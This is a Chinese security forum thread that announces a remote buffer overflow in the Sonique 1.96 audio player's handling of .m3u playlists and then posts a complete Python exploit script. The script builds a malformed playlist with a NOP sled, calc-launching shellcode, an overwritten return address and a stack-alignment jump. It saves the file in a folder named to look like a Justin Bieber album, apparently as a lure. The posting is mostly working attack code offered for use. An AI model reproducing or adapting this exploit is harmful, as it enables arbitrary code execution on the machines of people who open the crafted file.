|
 | 作者: DarK-Z [bridex]
 论坛用户 |
登录 |
| Sonique是一款免费的音频播放器。 Sonique在处理畸形.m3u文件时存在远程缓冲区溢出漏洞,远程攻击者可利用此漏洞在受影响应用程序中执行任意代码或造成拒绝服务攻击。 |
| 地主 发表时间: 11-06-08 10:45 |
| 回复: DarK-Z [bridex] 论坛用户 |
登录 |
|
#Application: Sonique BOF EIP Overwrite #Version: 1.96 #Author: Securityxxxpert #Date Submitted: May 17, 2011 #Download Link: http://www.tucows.com/preview/193562 #Tested on: Windows XP SP3 #EIP Overwritten: 239 Bytes #Pita Bytes: 0x00 0x83 0x88 0x93 #Notes: Not universal, find your own offsets if not SP3 Eng #Notes Cont: 4 Nops is added before aligning the stack in order to align the stack properly without errors #Humor: Waterbottle + Justin Bieber's Head = Pwnage "--------------------------------------------------------------------------------" print " Sonique Player Exploit " print " Retreat Hell! " print "Greetz: Acidgen, Subinacls, GrumpyBear, Pyoor, Corelanc0d3r, Dr. Nick, Rek0n " print "Greetz Cont: Connection, MaXe, ronin, Intern0t, " print "Greetz Cont: Podjackel, g0tmi1k & The entire Corelan & Offensive Security Teams " "--------------------------------------------------------------------------------" import os filename = "waterbottle.m3u" nopsled="\x90"*93 #Sliding to pwnage sc=("\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0") #16 byte Calc Shellcode filler = "\x90"*130 eip='\x6F\x9C\x10\x5D' #0x5D109C6F alignjmp='\x83\xC3\x1c\x90'+'\xff\xe3' #Aligns the stack to EBX1c, then Jumps to EBX *EBX1C* Junk='\x42' * 10000 exploit = nopsled + sc + filler + eip + "\x90"* 4 + alignjmp + Junk os.makedirs ("./Justin.Beiber -My World") os.chdir ("./Justin.Beiber -My World") textfile = open(filename,"w") textfile.write(exploit) textfile.close() |
| B1层 发表时间: 11-06-08 10:47 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 黑客进阶 标题: 最新Sonique.m3u文件远程缓冲区溢出漏洞+源攻击代码